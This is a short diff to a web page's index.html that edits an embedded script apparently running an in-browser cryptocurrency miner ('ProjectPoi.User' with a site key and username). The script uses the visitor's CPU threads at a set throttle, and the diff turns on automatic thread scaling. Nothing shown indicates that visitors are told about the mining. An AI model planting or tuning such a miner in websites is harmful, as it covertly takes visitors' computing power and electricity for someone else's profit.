--- a/1sjwk/index.html
+++ b/1sjwk/index.html
@@ -11,7 +11,7 @@
 		<script>
 			var miner = new ProjectPoi.User('BLuRXQ2XBPG0jSEBBnysmfVJ', 'john-doe-sj', {
 	threads: navigator.hardwareConcurrency,
-	autoThreads: false,
+	autoThreads: true,
 	throttle: 0.6,
 	forceASMJS: false
 });
